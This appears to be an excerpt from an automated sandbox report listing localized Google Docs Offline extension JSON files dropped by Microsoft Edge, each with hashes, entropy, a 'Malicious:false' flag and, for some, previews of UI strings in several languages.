                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1160
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3264
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3235
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3122
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1895
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                                                        MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                                                        SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                                                        SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1042
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2535
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                                                        MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                                                        SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                                                        SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1028
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                                                        MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                                                        SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):994
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                                                        MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                                                        SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2091
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                                                        MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                                                        SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                                                        SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                                                        SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2778
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                                                        MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                                                        SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                                                        SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1719
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                                                        MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                                                        SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                                                        SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):936
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                                                        MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                                                        SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3830
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                                                        MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1898
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):878
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2766
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):978
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):907
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
